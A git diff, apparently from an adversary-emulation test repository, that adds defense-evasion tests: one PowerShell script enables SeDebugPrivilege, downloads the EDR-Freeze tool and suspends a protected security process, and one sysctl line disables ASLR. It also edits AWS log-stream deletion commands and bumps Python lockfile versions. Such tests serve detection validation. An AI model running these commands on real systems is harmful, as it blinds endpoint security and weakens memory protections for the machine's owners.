+Write-Output "File deleted: $edrFreezeExe"
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #59 - Disable ASLR Via sysctl parameters - Linux
+Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0` which disables Address Space Layout Randomization (ASLR) in Linux.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** ac333fe1-ce2b-400b-a117-538634427439
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+sysctl -w kernel.randomize_va_space=0
+```
+
+#### Cleanup Commands:
+```bash
+sysctl -w kernel.randomize_va_space=2
+```
+
+
+
+
+
 <br/>

atomics/T1562.001/T1562.001.yaml

@@ -1200,3 +1200,173 @@ atomic_tests:
     cleanup_command: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" -Name Enabled -Value 1 -PropertyType "DWord" -Force
     name: powershell
     elevation_required: true
+- name: Freeze PPL-protected process with EDR-Freeze
+  auto_generated_guid: cbb2573a-a6ad-4c87-aef8-6e175598559b
+  description: This test utilizes the tool EDR-Freeze, which leverages the native Microsoft binary WerFaultSecure.exe to suspend processes protected by the Protected Process Light mechanism. PPL is a Windows security feature designed to safeguard critical system processes — such as those related to antivirus, credential protection, and system integrity — from tampering or inspection. These processes operate in a restricted environment that prevents access even from administrators or debugging tools, unless the accessing tool is signed and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently trusted by the operating system, EDR-Freeze is able to bypass these restrictions and temporarily freeze PPL-protected processes for analysis or testing purposes.
+  supported_platforms:
+  - windows
+  input_arguments:
+    processName:
+      type: string
+      default: "SecurityHealthService"
+      description: PPL-protected process name to target
+  executor:
+    command: |-
+      # Enable SeDebugPrivilege
+      Add-Type -TypeDefinition @"
+      using System;
+      using System.Runtime.InteropServices;
+
+      public class TokenAdjuster {
+          [DllImport("advapi32.dll", SetLastError = true)]
+          public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
+
+          [DllImport("advapi32.dll", SetLastError = true)]
+          public static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out long lpLuid);
+
+          [DllImport("advapi32.dll", SetLastError = true)]
+          public static extern bool AdjustTokenPrivileges(IntPtr TokenHandle, bool DisableAllPrivileges,
+              ref TOKEN_PRIVILEGES NewState, uint BufferLength, IntPtr PreviousState, IntPtr ReturnLength);
+
+          [StructLayout(LayoutKind.Sequential, Pack = 1)]
+          public struct TOKEN_PRIVILEGES {
+              public int PrivilegeCount;
+              public long Luid;
+              public int Attributes;
+          }
+
+          public const int SE_PRIVILEGE_ENABLED = 0x00000002;
+          public const uint TOKEN_ADJUST_PRIVILEGES = 0x0020;
+          public const uint TOKEN_QUERY = 0x0008;
+
+          public static bool EnableSeDebugPrivilege() {
+              IntPtr hToken;
+              if (!OpenProcessToken(System.Diagnostics.Process.GetCurrentProcess().Handle, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out hToken))
+                  return false;
+
+              long luid;
+              if (!LookupPrivilegeValue(null, "SeDebugPrivilege", out luid))
+                  return false;
+
+              TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES();
+              tp.PrivilegeCount = 1;
+              tp.Luid = luid;
+              tp.Attributes = SE_PRIVILEGE_ENABLED;
+
+              return AdjustTokenPrivileges(hToken, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);
+          }
+      }
+      "@
+
+      $result = [TokenAdjuster]::EnableSeDebugPrivilege()
+      if ($result) {
+          Write-Host "SeDebugPrivilege enabled successfully." -ForegroundColor Green
+      } else {
+          Write-Host "Failed to enable SeDebugPrivilege." -ForegroundColor Red
+          exit 1
+      }
+
+      # Get basic process info
+      $process = Get-Process -Name $#{processName} -ErrorAction Stop
+      $processName = $process.ProcessName
+      Write-Host "Process Name: $processName)"
+      Write-Host "PID: $($process.Id)"
+              
+      # Get executable path and user info
+      $query = "SELECT * FROM Win32_Process WHERE Name = '$processName.exe'"
+      $wmiProcess = Get-WmiObject -Query $query
+
+      $owner = $wmiProcess.GetOwner()
+          Write-Host "User: $($owner.Domain)\$($owner.User)"
+
+
+      # Get the folder of the current script
+      $scriptFolder = Split-Path -Parent $MyInvocation.MyCommand.Definition
+
+      # Download latest EDR-Freeze package and extract (force replace)
+      $downloadUrl = "https://github.com/TwoSevenOneT/EDR-Freeze/releases/download/main/EDR-Freeze_1.0.zip"
+      $zipPath = Join-Path $scriptFolder "EDR-Freeze_1.0.zip"
+      Write-Host "Downloading latest EDR-Freeze from $downloadUrl" -ForegroundColor Cyan
+      try {
+          Invoke-WebRequest -Uri $downloadUrl -OutFile $zipPath -UseBasicParsing -ErrorAction Stop
+          Write-Host "Download completed: $zipPath" -ForegroundColor Green
+          $extractFolder = $scriptFolder
+          if (Test-Path $zipPath) {
+              Write-Host "Extracting archive to $extractFolder (overwriting existing files)" -ForegroundColor Cyan
+              if (Test-Path $extractFolder) {
+                  # Ensure target exe not locked; attempt to stop any running instance silently
+                  Get-Process -Name "EDR-Freeze_1.0" -ErrorAction SilentlyContinue | Stop-Process -Force -ErrorAction SilentlyContinue
+              }
+              Add-Type -AssemblyName System.IO.Compression.FileSystem 2>$null
+              # Custom extraction routine (overwrite existing) compatible with .NET Framework (no bool overwrite overload)
+              $archive = $null
+              try {
+                  $archive = [System.IO.Compression.ZipFile]::OpenRead($zipPath)
+                  foreach ($entry in $archive.Entries) {
+                      if ([string]::IsNullOrWhiteSpace($entry.FullName)) { continue }
+                      if ($entry.FullName.EndsWith('/')) { # directory entry
+                          $dirPath = Join-Path $extractFolder $entry.FullName
+                          if (-not (Test-Path $dirPath)) { New-Item -ItemType Directory -Path $dirPath -Force | Out-Null }
+                          continue
+                      }
+                      $destPath = Join-Path $extractFolder $entry.FullName
+                      $destDir = Split-Path $destPath -Parent
+                      if (-not (Test-Path $destDir)) { New-Item -ItemType Directory -Path $destDir -Force | Out-Null }
+                      if (Test-Path $destPath) { Remove-Item -Path $destPath -Force -ErrorAction SilentlyContinue }
+                      try {
+                          # Use static extension method (PowerShell 5.1 compatible)
+                          [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry, $destPath, $false)
+                      } catch {
+                          Write-Host "Failed to extract entry $($entry.FullName): $_" -ForegroundColor Yellow
+                      }
+                  }
+                  Write-Host "Extraction completed." -ForegroundColor Green
+              } finally {
+                  if ($archive) { $archive.Dispose() }
+              }
+          }
+      } catch {
+          Write-Host "Failed to download or extract EDR-Freeze: $_" -ForegroundColor Red
+      }
+
+      # Wait 15s before putting targeted process before putting it in the comma
+      Write-Host "Waiting 15s before putting $processName in the comma" -ForegroundColor Yellow
+      Start-Sleep -Seconds 5
+      Write-Host "Waiting 10s before putting $processName in the comma" -ForegroundColor Yellow
+      Start-Sleep -Seconds 5
+      Write-Host "Waiting 5s before putting $processName in the comma" -ForegroundColor Yellow
+      Start-Sleep -Seconds 3
+      Write-Host "Waiting 2s before putting $processName in the comma" -ForegroundColor Yellow
+      Start-Sleep -Seconds 2
+
+      # Put targeted  process in the comma for 15s
+      # Discover the EDR-Freeze executable dynamically (pick most recent if multiple)
+      $edrFreezeExeName = Get-ChildItem -Path $scriptFolder -Filter 'EDR-Freeze_*.exe' -ErrorAction SilentlyContinue |
+          Sort-Object LastWriteTime -Descending |
+          Select-Object -First 1 -ExpandProperty Name
+      if (-not $edrFreezeExeName) {
+          Write-Host "No EDR-Freeze executable (EDR-Freeze_*.exe) found in $scriptFolder" -ForegroundColor Red
+          exit 1
+      }
+
+      $edrFreezeExe = Join-Path $scriptFolder $edrFreezeExeName
+      Write-Host "Using EDR-Freeze executable: $edrFreezeExeName" -ForegroundColor Cyan
+      Write-Host "$processName putted in the comma for 15s, by targetting Process ID $($htaProcess.Id)" -ForegroundColor Yellow
+      Start-Process -FilePath $edrFreezeExe -ArgumentList ("$($process.Id) 15000") | Out-Null
+    cleanup_command: |-
+      Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
+      Write-Output "File deleted: $edrFreezeExe"
+    name: powershell
+    elevation_required: true
+- name: Disable ASLR Via sysctl parameters - Linux
+  auto_generated_guid: ac333fe1-ce2b-400b-a117-538634427439
+  description: Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0` which disables Address Space Layout Randomization (ASLR) in Linux.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      sysctl -w kernel.randomize_va_space=0
+    cleanup_command: |
+      sysctl -w kernel.randomize_va_space=2
+    name: bash
+    elevation_required: true

atomics/T1562.008/T1562.008.md

@@ -559,9 +559,9 @@ deleting the log stream. Once it is deleted, the logs created by the attackers w
 ```sh
 aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
 echo "*** Log Group Created ***"
-aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
 echo "*** Log Stream Created ***"
-aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
 echo "*** Log Stream Deleted ***"
 aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
 echo "*** Log Group Deleted ***"

atomics/T1562.008/T1562.008.yaml

@@ -388,9 +388,9 @@ atomic_tests:
     command: |
       aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
       echo "*** Log Group Created ***"
-      aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+      aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
       echo "*** Log Stream Created ***"
-      aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+      aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
       echo "*** Log Stream Deleted ***"
       aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
       echo "*** Log Group Deleted ***"

atomics/used_guids.txt

@@ -1762,3 +1762,12 @@ b404caaa-12ce-43c7-9214-62a531c044f7
 03ae82a6-9fa0-465b-91df-124d8ca5c4e8
 d2a1f4bc-a064-4223-8281-a086dce5423c
 0eeb68ce-e64c-4420-8d53-ad5bdc6f86d5
+361fe49d-0c19-46ec-a483-ccb92d38e88e
+210be7ea-d841-40ec-b3e1-ff610bb62744
+cbb2573a-a6ad-4c87-aef8-6e175598559b
+ac333fe1-ce2b-400b-a117-538634427439
+6e76f56f-2373-4a6c-a63f-98b7b72761f1
+d9efa6c7-6518-42b2-809a-4f2a8e242b9b
+7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3
+9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
+a9604672-cd46-493b-b58f-fd4124c22dd3

poetry.lock

@@ -1,4 +1,4 @@
-# This file is automatically @generated by Poetry 2.1.1 and should not be changed by hand.
+# This file is automatically @generated by Poetry 2.2.1 and should not be changed by hand.
 
 [[package]]
 name = "annotated-types"
@@ -135,14 +135,14 @@ files = [
 
 [[package]]
 name = "click"
-version = "8.2.1"
+version = "8.3.0"
 description = "Composable command line interface toolkit"
 optional = false
 python-versions = ">=3.10"
 groups = ["main"]
 files = [
-    {file = "click-8.2.1-py3-none-any.whl", hash = "sha256:61a3265b914e850b85317d0b3109c7f8cd35a670f963866005d6ef1d5175a12b"},
-    {file = "click-8.2.1.tar.gz", hash = "sha256:27c491cc05d968d271d5a1db13e3b5a184636d9d930f148c50b038f0d0646202"},
+    {file = "click-8.3.0-py3-none-any.whl", hash = "sha256:9b9f285302c6e3064f4330c05f05b81945b2a39544279343e6e7c5f27a9baddc"},
+    {file = "click-8.3.0.tar.gz", hash = "sha256:e7b8232224eba16f4ebe410c25ced9f7875cb5f3263ffc93cc3e8da705e229c4"},
 ]
 
 [package.dependencies]
@@ -155,7 +155,7 @@ description = "Cross-platform colored terminal text."
 optional = false
 python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,!=3.6.*,>=2.7"
 groups = ["main"]
-markers = "sys_platform == \"win32\" or platform_system == \"Windows\""
+markers = "platform_system == \"Windows\" or sys_platform == \"win32\""
 files = [
     {file = "colorama-0.4.6-py2.py3-none-any.whl", hash = "sha256:4f1d9991f5acc0ca119f9d443620b77f9d6b33703e51011c16baf57afb285fc6"},
     {file = "colorama-0.4.6.tar.gz", hash = "sha256:08695f5cb7ed6e0531a20572697297273c47b8cae5a63ffc6d6ed5c201be6e44"},
@@ -163,14 +163,14 @@ files = [
 
 [[package]]
 name = "hypothesis"
-version = "6.138.13"
+version = "6.140.2"
 description = "A library for property-based testing"
 optional = false
 python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "hypothesis-6.138.13-py3-none-any.whl", hash = "sha256:09f1130deb08e5d12fb3b59b55c113fd79debaaab9b224ffac17be8341de4326"},
-    {file = "hypothesis-6.138.13.tar.gz", hash = "sha256:2bea91629b8b3bb103a5b51442b1037cede3aae26e56ec063c52b9d5d8eaf70b"},
+    {file = "hypothesis-6.140.2-py3-none-any.whl", hash = "sha256:4524cb84be90961563ef15634e2efe96150bbcce47621a13cff3c1b03a326663"},
+    {file = "hypothesis-6.140.2.tar.gz", hash = "sha256:b3b4a162134eeef8a992621de6c43d80e03d44704a3c3bfb5b9d0661b375b0d2"},
 ]
 
 [package.dependencies]
@@ -246,14 +246,14 @@ format-nongpl = ["fqdn", "idna", "isoduration", "jsonpointer (>1.13)", "rfc3339-
 
 [[package]]
 name = "jsonschema-specifications"
-version = "2025.4.1"
+version = "2025.9.1"
 description = "The JSON Schema meta-schemas and vocabularies, exposed as a Registry"
 optional = false
 python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "jsonschema_specifications-2025.4.1-py3-none-any.whl", hash = "sha256:4653bffbd6584f7de83a67e0d620ef16900b390ddc7939d56684d6c81e33f1af"},
-    {file = "jsonschema_specifications-2025.4.1.tar.gz", hash = "sha256:630159c9f4dbea161a6a2205c3011cc4f18ff381b189fff48bb39b9bf26ae608"},
+    {file = "jsonschema_specifications-2025.9.1-py3-none-any.whl", hash = "sha256:98802fee3a11ee76ecaca44429fda8a41bff98b00a0f2838151b113f210cc6fe"},
+    {file = "jsonschema_specifications-2025.9.1.tar.gz", hash = "sha256:b540987f239e745613c7a9176f3edb72b832a4ac465cf02712288397832b5e8d"},
 ]
 
 [package.dependencies]
@@ -325,14 +325,14 @@ testing = ["coverage", "pytest", "pytest-benchmark"]
 
 [[package]]
 name = "pydantic"
-version = "2.11.7"
+version = "2.11.10"
 description = "Data validation using Python type hints"
 optional = false
 python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "pydantic-2.11.7-py3-none-any.whl", hash = "sha256:dde5df002701f6de26248661f6835bbe296a47bf73990135c7d07ce741b9623b"},
-    {file = "pydantic-2.11.7.tar.gz", hash = "sha256:d989c3c6cb79469287b1569f7447a17848c998458d49ebe294e975b9baf0f0db"},
+    {file = "pydantic-2.11.10-py3-none-any.whl", hash = "sha256:802a655709d49bd004c31e865ef37da30b540786a46bfce02333e0e24b5fe29a"},
+    {file = "pydantic-2.11.10.tar.gz", hash = "sha256:dc280f0982fbda6c38fada4e476dc0a4f3aeaf9c6ad4c28df68a666ec3c61423"},
 ]
 
 [package.dependencies]
@@ -474,14 +474,14 @@ windows-terminal = ["colorama (>=0.4.6)"]
 
 [[package]]
 name = "pytest"
-version = "8.4.1"
+version = "8.4.2"
 description = "pytest: simple powerful testing with Python"
 optional = false
 python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "pytest-8.4.1-py3-none-any.whl", hash = "sha256:539c70ba6fcead8e78eebbf1115e8b589e7565830d7d006a8723f19ac8a0afb7"},
-    {file = "pytest-8.4.1.tar.gz", hash = "sha256:7c67fd69174877359ed9371ec3af8a3d2b04741818c51e5e99cc1742251fa93c"},
+    {file = "pytest-8.4.2-py3-none-any.whl", hash = "sha256:872f880de3fc3a5bdc88a11b39c9710c3497a547cfa9320bc3c5e62fbf272e79"},
+    {file = "pytest-8.4.2.tar.gz", hash = "sha256:86c0d0b93306b961d58d62a4db4879f27fe25513d4b969df351abdddb3c30e01"},
 ]
 
 [package.dependencies]
@@ -496,65 +496,85 @@ dev = ["argcomplete", "attrs (>=19.2)", "hypothesis (>=3.56)", "mock", "requests
 
 [[package]]
 name = "pyyaml"
-version = "6.0.2"
+version = "6.0.3"
 description = "YAML parser and emitter for Python"
 optional = false
 python-versions = ">=3.8"
 groups = ["main"]
 files = [
-    {file = "PyYAML-6.0.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:0a9a2848a5b7feac301353437eb7d5957887edbf81d56e903999a75a3d743086"},
-    {file = "PyYAML-6.0.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:29717114e51c84ddfba879543fb232a6ed60086602313ca38cce623c1d62cfbf"},
-    {file = "PyYAML-6.0.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8824b5a04a04a047e72eea5cec3bc266db09e35de6bdfe34c9436ac5ee27d237"},
-    {file = "PyYAML-6.0.2-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:7c36280e6fb8385e520936c3cb3b8042851904eba0e58d277dca80a5cfed590b"},
-    {file = "PyYAML-6.0.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ec031d5d2feb36d1d1a24380e4db6d43695f3748343d99434e6f5f9156aaa2ed"},
-    {file = "PyYAML-6.0.2-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:936d68689298c36b53b29f23c6dbb74de12b4ac12ca6cfe0e047bedceea56180"},
-    {file = "PyYAML-6.0.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:23502f431948090f597378482b4812b0caae32c22213aecf3b55325e049a6c68"},
-    {file = "PyYAML-6.0.2-cp310-cp310-win32.whl", hash = "sha256:2e99c6826ffa974fe6e27cdb5ed0021786b03fc98e5ee3c5bfe1fd5015f42b99"},
-    {file = "PyYAML-6.0.2-cp310-cp310-win_amd64.whl", hash = "sha256:a4d3091415f010369ae4ed1fc6b79def9416358877534caf6a0fdd2146c87a3e"},
-    {file = "PyYAML-6.0.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:cc1c1159b3d456576af7a3e4d1ba7e6924cb39de8f67111c735f6fc832082774"},
-    {file = "PyYAML-6.0.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:1e2120ef853f59c7419231f3bf4e7021f1b936f6ebd222406c3b60212205d2ee"},
-    {file = "PyYAML-6.0.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5d225db5a45f21e78dd9358e58a98702a0302f2659a3c6cd320564b75b86f47c"},
-    {file = "PyYAML-6.0.2-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5ac9328ec4831237bec75defaf839f7d4564be1e6b25ac710bd1a96321cc8317"},
-    {file = "PyYAML-6.0.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3ad2a3decf9aaba3d29c8f537ac4b243e36bef957511b4766cb0057d32b0be85"},
-    {file = "PyYAML-6.0.2-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:ff3824dc5261f50c9b0dfb3be22b4567a6f938ccce4587b38952d85fd9e9afe4"},
-    {file = "PyYAML-6.0.2-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:797b4f722ffa07cc8d62053e4cff1486fa6dc094105d13fea7b1de7d8bf71c9e"},
-    {file = "PyYAML-6.0.2-cp311-cp311-win32.whl", hash = "sha256:11d8f3dd2b9c1207dcaf2ee0bbbfd5991f571186ec9cc78427ba5bd32afae4b5"},
-    {file = "PyYAML-6.0.2-cp311-cp311-win_amd64.whl", hash = "sha256:e10ce637b18caea04431ce14fabcf5c64a1c61ec9c56b071a4b7ca131ca52d44"},
-    {file = "PyYAML-6.0.2-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:c70c95198c015b85feafc136515252a261a84561b7b1d51e3384e0655ddf25ab"},
-    {file = "PyYAML-6.0.2-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:ce826d6ef20b1bc864f0a68340c8b3287705cae2f8b4b1d932177dcc76721725"},
-    {file = "PyYAML-6.0.2-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1f71ea527786de97d1a0cc0eacd1defc0985dcf6b3f17bb77dcfc8c34bec4dc5"},
-    {file = "PyYAML-6.0.2-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9b22676e8097e9e22e36d6b7bda33190d0d400f345f23d4065d48f4ca7ae0425"},
-    {file = "PyYAML-6.0.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:80bab7bfc629882493af4aa31a4cfa43a4c57c83813253626916b8c7ada83476"},
-    {file = "PyYAML-6.0.2-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:0833f8694549e586547b576dcfaba4a6b55b9e96098b36cdc7ebefe667dfed48"},
-    {file = "PyYAML-6.0.2-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:8b9c7197f7cb2738065c481a0461e50ad02f18c78cd75775628afb4d7137fb3b"},
-    {file = "PyYAML-6.0.2-cp312-cp312-win32.whl", hash = "sha256:ef6107725bd54b262d6dedcc2af448a266975032bc85ef0172c5f059da6325b4"},
-    {file = "PyYAML-6.0.2-cp312-cp312-win_amd64.whl", hash = "sha256:7e7401d0de89a9a855c839bc697c079a4af81cf878373abd7dc625847d25cbd8"},
-    {file = "PyYAML-6.0.2-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:efdca5630322a10774e8e98e1af481aad470dd62c3170801852d752aa7a783ba"},
-    {file = "PyYAML-6.0.2-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:50187695423ffe49e2deacb8cd10510bc361faac997de9efef88badc3bb9e2d1"},
-    {file = "PyYAML-6.0.2-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0ffe8360bab4910ef1b9e87fb812d8bc0a308b0d0eef8c8f44e0254ab3b07133"},
-    {file = "PyYAML-6.0.2-cp313-cp313-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:17e311b6c678207928d649faa7cb0d7b4c26a0ba73d41e99c4fff6b6c3276484"},
-    {file = "PyYAML-6.0.2-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:70b189594dbe54f75ab3a1acec5f1e3faa7e8cf2f1e08d9b561cb41b845f69d5"},
-    {file = "PyYAML-6.0.2-cp313-cp313-musllinux_1_1_aarch64.whl", hash = "sha256:41e4e3953a79407c794916fa277a82531dd93aad34e29c2a514c2c0c5fe971cc"},
-    {file = "PyYAML-6.0.2-cp313-cp313-musllinux_1_1_x86_64.whl", hash = "sha256:68ccc6023a3400877818152ad9a1033e3db8625d899c72eacb5a668902e4d652"},
-    {file = "PyYAML-6.0.2-cp313-cp313-win32.whl", hash = "sha256:bc2fa7c6b47d6bc618dd7fb02ef6fdedb1090ec036abab80d4681424b84c1183"},
-    {file = "PyYAML-6.0.2-cp313-cp313-win_amd64.whl", hash = "sha256:8388ee1976c416731879ac16da0aff3f63b286ffdd57cdeb95f3f2e085687563"},
-    {file = "PyYAML-6.0.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:24471b829b3bf607e04e88d79542a9d48bb037c2267d7927a874e6c205ca7e9a"},
-    {file = "PyYAML-6.0.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d7fded462629cfa4b685c5416b949ebad6cec74af5e2d42905d41e257e0869f5"},
-    {file = "PyYAML-6.0.2-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d84a1718ee396f54f3a086ea0a66d8e552b2ab2017ef8b420e92edbc841c352d"},
-    {file = "PyYAML-6.0.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9056c1ecd25795207ad294bcf39f2db3d845767be0ea6e6a34d856f006006083"},
-    {file = "PyYAML-6.0.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:82d09873e40955485746739bcb8b4586983670466c23382c19cffecbf1fd8706"},
-    {file = "PyYAML-6.0.2-cp38-cp38-win32.whl", hash = "sha256:43fa96a3ca0d6b1812e01ced1044a003533c47f6ee8aca31724f78e93ccc089a"},
-    {file = "PyYAML-6.0.2-cp38-cp38-win_amd64.whl", hash = "sha256:01179a4a8559ab5de078078f37e5c1a30d76bb88519906844fd7bdea1b7729ff"},
-    {file = "PyYAML-6.0.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:688ba32a1cffef67fd2e9398a2efebaea461578b0923624778664cc1c914db5d"},
-    {file = "PyYAML-6.0.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:a8786accb172bd8afb8be14490a16625cbc387036876ab6ba70912730faf8e1f"},
-    {file = "PyYAML-6.0.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d8e03406cac8513435335dbab54c0d385e4a49e4945d2909a581c83647ca0290"},
-    {file = "PyYAML-6.0.2-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f753120cb8181e736c57ef7636e83f31b9c0d1722c516f7e86cf15b7aa57ff12"},
-    {file = "PyYAML-6.0.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3b1fdb9dc17f5a7677423d508ab4f243a726dea51fa5e70992e59a7411c89d19"},
-    {file = "PyYAML-6.0.2-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:0b69e4ce7a131fe56b7e4d770c67429700908fc0752af059838b1cfb41960e4e"},
-    {file = "PyYAML-6.0.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:a9f8c2e67970f13b16084e04f134610fd1d374bf477b17ec1599185cf611d725"},
-    {file = "PyYAML-6.0.2-cp39-cp39-win32.whl", hash = "sha256:6395c297d42274772abc367baaa79683958044e5d3835486c16da75d2a694631"},
-    {file = "PyYAML-6.0.2-cp39-cp39-win_amd64.whl", hash = "sha256:39693e1f8320ae4f43943590b49779ffb98acb81f788220ea932a6b6c51004d8"},
-    {file = "pyyaml-6.0.2.tar.gz", hash = "sha256:d584d9ec91ad65861cc08d42e834324ef890a082e591037abe114850ff7bbc3e"},
+    {file = "PyYAML-6.0.3-cp38-cp38-macosx_10_13_x86_64.whl", hash = "sha256:c2514fceb77bc5e7a2f7adfaa1feb2fb311607c9cb518dbc378688ec73d8292f"},
+    {file = "PyYAML-6.0.3-cp38-cp38-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:9c57bb8c96f6d1808c030b1687b9b5fb476abaa47f0db9c0101f5e9f394e97f4"},
+    {file = "PyYAML-6.0.3-cp38-cp38-manylinux2014_s390x.manylinux_2_17_s390x.manylinux_2_28_s390x.whl", hash = "sha256:efd7b85f94a6f21e4932043973a7ba2613b059c4a000551892ac9f1d11f5baf3"},
+    {file = "PyYAML-6.0.3-cp38-cp38-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:22ba7cfcad58ef3ecddc7ed1db3409af68d023b7f940da23c6c2a1890976eda6"},
+    {file = "PyYAML-6.0.3-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:6344df0d5755a2c9a276d4473ae6b90647e216ab4757f8426893b5dd2ac3f369"},
+    {file = "PyYAML-6.0.3-cp38-cp38-win32.whl", hash = "sha256:3ff07ec89bae51176c0549bc4c63aa6202991da2d9a6129d7aef7f1407d3f295"},
+    {file = "PyYAML-6.0.3-cp38-cp38-win_amd64.whl", hash = "sha256:5cf4e27da7e3fbed4d6c3d8e797387aaad68102272f8f9752883bc32d61cb87b"},
+    {file = "pyyaml-6.0.3-cp310-cp310-macosx_10_13_x86_64.whl", hash = "sha256:214ed4befebe12df36bcc8bc2b64b396ca31be9304b8f59e25c11cf94a4c033b"},
+    {file = "pyyaml-6.0.3-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:02ea2dfa234451bbb8772601d7b8e426c2bfa197136796224e50e35a78777956"},
+    {file = "pyyaml-6.0.3-cp310-cp310-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:b30236e45cf30d2b8e7b3e85881719e98507abed1011bf463a8fa23e9c3e98a8"},
+    {file = "pyyaml-6.0.3-cp310-cp310-manylinux2014_s390x.manylinux_2_17_s390x.manylinux_2_28_s390x.whl", hash = "sha256:66291b10affd76d76f54fad28e22e51719ef9ba22b29e1d7d03d6777a9174198"},
+    {file = "pyyaml-6.0.3-cp310-cp310-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:9c7708761fccb9397fe64bbc0395abcae8c4bf7b0eac081e12b809bf47700d0b"},
